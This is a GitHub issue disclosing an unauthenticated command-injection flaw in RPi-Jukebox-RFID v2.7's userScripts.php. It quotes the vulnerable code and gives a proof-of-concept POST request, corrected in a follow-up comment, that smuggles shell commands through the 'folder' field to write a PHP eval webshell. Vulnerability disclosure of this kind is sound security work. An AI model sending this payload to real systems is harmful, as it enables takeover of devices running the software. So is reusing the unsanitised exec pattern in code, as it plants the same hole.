Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

🐛 | RPi-Jukebox-RFID V2.7_RCE_4 #2399

Open
xjzzzxx opened this issue Jul 11, 2024 · 1 comment
Open

🐛 | RPi-Jukebox-RFID V2.7_RCE_4 #2399

xjzzzxx opened this issue Jul 11, 2024 · 1 comment
Labels
bug legacy_v2 Issues, discussions and PRs related to Version 2.x needs triage

Comments

@xjzzzxx
Copy link

xjzzzxx commented Jul 11, 2024

Version

v2.7.0

Branch

released

OS

ubuntu 22

Pi model

unknown

Hardware

No response

What happened?

Hello,

I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)

Analysis

The path of the vulnerability: htdocs\userScripts.php

$post['filename'] = $_POST['filename'];  //Line 46 (Source)
if($_POST['ACTION'] == "userScript") {	// Line 62 (Check point)
    $messageAction.="Executed'sudo".$conf['scripts_abs']."/userscripts/".$post['folder']."".$post['folderNew']."'";    // Line 64 (Tainted)
    $exec="sudo".$conf['scripts_abs']."/userscripts/".$post['folder']."".$post['folderNew'];	// Line 67 (Tainted)
    
 exec($exec);	// Line 68(Sink)
}

Source from Line 46 ($_POST['filename']) .

And then there is a check point(Line 62) ,which we should set $_POST['ACTION'] = userScript to bypass.

After bypass the check point, the source(tainted) pass to $exec and exec($exec);(Line 68) without another check.

Poc

POST /htdocs/userScripts.php

Data:

ACTION=userScript&folder=hello+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell4.php+%3b&folderNew=echo+%22hello%22

Here is the version without url encoding for ease of understanding:

ACTION=userScript&folder=hello ; echo "<?php @eval($_POST['pass']) ?>" > ./shell4.php ;&folderNew=echo "hello"

Manual verification

7

8

The attacker can then easily connect to this webshell(/htdocs/shell4.php)

Logs

No response

Configuration

No response

More info

No response

@xjzzzxx xjzzzxx added bug legacy_v2 Issues, discussions and PRs related to Version 2.x needs triage labels Jul 11, 2024
@xjzzzxx
Copy link
Author

xjzzzxx commented Jul 12, 2024

I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:

Poc_fixed

POST /htdocs/userScripts.php

Data

ACTION=userScript&folder=hello+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell4%27%5d)+%3f%3e%22++%3e+.%2fshell4.php+%3b&folderNew=echo+%22hello%22

Here is Data without url encoding for ease of understanding:

ACTION=userScript&folder=hello ; echo "<?php @eval(\$_POST['shell4']) ?>" > ./shell4.php ;&folderNew=echo "hello"

Manual verification

17

18

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug legacy_v2 Issues, discussions and PRs related to Version 2.x needs triage
Projects
None yet
Development

No branches or pull requests

1 participant